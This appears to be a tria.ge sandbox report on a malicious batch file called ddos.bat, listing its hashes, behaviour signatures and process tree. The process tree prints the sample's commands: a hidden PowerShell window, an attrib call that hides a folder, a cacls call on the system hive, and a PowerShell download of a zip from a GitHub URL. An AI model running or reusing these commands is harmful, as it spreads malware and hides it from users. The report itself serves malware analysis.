Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
118s -
max time network
119s -
platform
windows7_x64 -
resource
win7-20240903-en -
resource tags
arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system -
submitted
18/10/2024, 22:27
Static task
static1
Behavioral task
behavioral1
Sample
ddos.bat
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
ddos.bat
Resource
win10v2004-20241007-en
General
-
Target
ddos.bat
-
Size
1KB
-
MD5
15ee8aecfc89d8bed8f362cb46e4b8bb
-
SHA1
c39b884897d73006daa07d29264670d181835624
-
SHA256
7af1c25851ef3f66cbca82540d35470de8a364a469d00a013891bd211f56e082
-
SHA512
553a78c7e82669145767747c287244c2e253a938f7379feaf71425e5f4eeedc612157f812d7d723c3edc57d6f534f152714f173e3b10e55331b16b8f741a3b66
Malware Config
Signatures
-
Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs
Run Powershell and hide display window.
pid Process 2436 powershell.exe 400 powershell.exe -
Deletes itself 1 IoCs
pid Process 1852 cmd.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious behavior: EnumeratesProcesses 2 IoCs
pid Process 2436 powershell.exe 400 powershell.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
description pid Process Token: SeDebugPrivilege 2436 powershell.exe Token: SeDebugPrivilege 400 powershell.exe -
Suspicious use of WriteProcessMemory 12 IoCs
description pid Process procid_target PID 1852 wrote to memory of 2436 1852 cmd.exe 29 PID 1852 wrote to memory of 2436 1852 cmd.exe 29 PID 1852 wrote to memory of 2436 1852 cmd.exe 29 PID 1852 wrote to memory of 2832 1852 cmd.exe 30 PID 1852 wrote to memory of 2832 1852 cmd.exe 30 PID 1852 wrote to memory of 2832 1852 cmd.exe 30 PID 1852 wrote to memory of 2856 1852 cmd.exe 31 PID 1852 wrote to memory of 2856 1852 cmd.exe 31 PID 1852 wrote to memory of 2856 1852 cmd.exe 31 PID 1852 wrote to memory of 400 1852 cmd.exe 32 PID 1852 wrote to memory of 400 1852 cmd.exe 32 PID 1852 wrote to memory of 400 1852 cmd.exe 32 -
Views/modifies file attributes 1 TTPs 1 IoCs
pid Process 2856 attrib.exe
Processes
-
C:\Windows\system32\cmd.execmd /c "C:\Users\Admin\AppData\Local\Temp\ddos.bat"1⤵
- Deletes itself
- Suspicious use of WriteProcessMemory
PID:1852 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -window hidden -command ""2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2436
-
-
C:\Windows\system32\cacls.exe"C:\Windows\system32\cacls.exe" "C:\Windows\system32\config\system"2⤵PID:2832
-
-
C:\Windows\system32\attrib.exeattrib +h "Anon" /s /d2⤵
- Views/modifies file attributes
PID:2856
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePowershell -Command "Invoke-Webrequest 'https://github.com/bonsko216/1/raw/refs/heads/main/1.zip' -OutFile 1.zip"2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:400
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize7KB
MD509a645adfc822ddbd1102bf73c3c3f6b
SHA1824f4dbc71119970470c261c1fb378b894b2fda0
SHA25613e5e0d03dfdb0b2df0bcba59f08c4a09684001405fbfd439dd6502dc15bc98f
SHA5126b58ab090126e1847ff71cd05cfc2a0e4cf0dcd6fc76519d09e6edfe6883d4b6274f365f87a674e9fe8bf7706a865d74e1bf932cb96e02d589d952e2191737ca